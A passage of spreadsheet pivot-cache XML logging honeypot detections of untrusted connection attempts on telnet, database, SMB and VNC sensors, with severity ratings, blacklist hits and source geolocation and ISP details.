    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7505:b933"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2215"/>
    <x v="2215"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T18:49:34"/>
    <d v="2025-04-11T13:03:07"/>
    <d v="2025-04-11T18:49:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:927a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2216"/>
    <x v="2216"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T18:45:26"/>
    <d v="2024-06-26T13:28:57"/>
    <d v="2025-04-11T18:45:26"/>
    <n v="93"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;3306&amp;&amp;445&amp;&amp;5432"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="NA"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.19445"/>
    <s v="106.823"/>
    <s v="4800"/>
    <s v="PT Aplikanusa Lintasarta"/>
    <s v="PT Aplikanusa Lintasarta"/>
    <s v="business"/>
    <s v="Green Net Co., Ltd."/>
    <s v="2022-09-20"/>
    <s v="IDNIC-ZABRINA-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,47350)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,63285)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,65443)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,36282)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,39935)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,28687)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,32099)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,58156)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,60333)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,56560)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,58151)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,41776)}&amp;&amp;{Data_SMB:Incoming connection (103.8.185.158,43425)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6708:b99e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2217"/>
    <x v="2217"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T18:32:11"/>
    <d v="2025-04-11T18:32:11"/>
    <d v="2025-04-11T18:32:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:3332"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2218"/>
    <x v="2218"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T18:23:21"/>
    <d v="2025-04-11T18:23:21"/>
    <d v="2025-04-11T18:23:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b05b:f475"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2219"/>
    <x v="2219"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T18:10:29"/>
    <d v="2025-02-14T19:47:33"/>
    <d v="2025-04-11T18:10:29"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="NA"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0082"/>
    <s v="28.9784"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:58eb:53a6"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2220"/>
    <x v="2220"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T17:54:56"/>
    <d v="2025-04-11T17:54:56"/>
    <d v="2025-04-11T17:54:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:c67"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2221"/>
    <x v="2221"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T17:40:28"/>
    <d v="2025-04-11T17:37:06"/>
    <d v="2025-04-11T17:40:28"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8983"/>
    <s v="100.582"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="cellular"/>
    <s v="TOT Mobile Co LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:114:ee01"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2222"/>
    <x v="2222"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T17:29:38"/>
    <d v="2025-04-11T16:44:55"/>
    <d v="2025-04-11T17:29:38"/>
    <n v="67"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f8:2ffa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2223"/>
    <x v="2223"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T16:45:34"/>
    <d v="2025-04-03T14:49:22"/>
    <d v="2025-04-11T16:45:34"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445&amp;&amp;53052&amp;&amp;53938"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="2007-05-04"/>
    <s v="HATHWAY-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (116.72.2.182,53052)}&amp;&amp;{Data_SMB:Incoming connection (116.72.2.182,53938)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7448:2b6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2224"/>
    <x v="2224"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T16:40:16"/>
    <d v="2025-04-11T16:40:16"/>
    <d v="2025-04-11T16:40:16"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b59:d5cf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2225"/>
    <x v="2225"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T16:38:21"/>
    <d v="2025-04-11T16:38:21"/>
    <d v="2025-04-11T16:38:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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7:c3f2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2226"/>
    <x v="2226"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T16:18:11"/>
    <d v="2025-04-11T16:18:11"/>
    <d v="2025-04-11T16:18:11"/>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7:3e8b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2227"/>
    <x v="2227"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T15:58:29"/>
    <d v="2025-04-11T15:58:29"/>
    <d v="2025-04-11T15:58:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Nedumangād"/>
    <s v="1261553"/>
    <s v="NA"/>
    <s v="8.60267"/>
    <s v="77.0014"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:9436"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2228"/>
    <x v="2228"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T15:49:14"/>
    <d v="2025-04-11T15:48:33"/>
    <d v="2025-04-11T15:49:14"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surendranagar"/>
    <s v="Limbdi"/>
    <s v="1264912"/>
    <s v="NA"/>
    <s v="22.5651"/>
    <s v="71.8108"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="Ishan Netsol Pvt Ltd"/>
    <s v="business"/>
    <s v="Ishan Netsol Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f1:e8cd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2229"/>
    <x v="2229"/>
    <s v="rev-185-22-213-2.radiolan.sk&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T15:35:59"/>
    <d v="2025-03-15T15:40:41"/>
    <d v="2025-04-11T15:35:59"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SK"/>
    <s v="Slovakia"/>
    <s v="BL"/>
    <s v="Bratislava Region"/>
    <s v="Okres Bratislava IV"/>
    <s v="Karlova Ves"/>
    <s v="3059564"/>
    <s v="NA"/>
    <s v="48.1608"/>
    <s v="17.0463"/>
    <s v="43451"/>
    <s v="Slovanet a.s."/>
    <s v="RADIOLAN"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2013-04-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b916:d502"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2230"/>
    <x v="2230"/>
    <s v="60-251-191-212.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T15:33:15"/>
    <d v="2023-08-08T21:32:00"/>
    <d v="2025-04-11T15:33:15"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H32"/>
    <s v="445&amp;&amp;48020&amp;&amp;5900"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3cfb:bfd4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2231"/>
    <x v="2231"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T15:17:04"/>
    <d v="2025-04-11T15:15:32"/>
    <d v="2025-04-11T15:17:04"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="14"/>
    <s v="Phra Nakhon Si Ayutthaya"/>
    <s v="Phra Nakhon Si Ayutthaya"/>
    <s v="Phra Nakhon Si Ayutthaya"/>
    <s v="1607532"/>
    <s v="NA"/>
    <s v="14.3517"/>
    <s v="100.577"/>
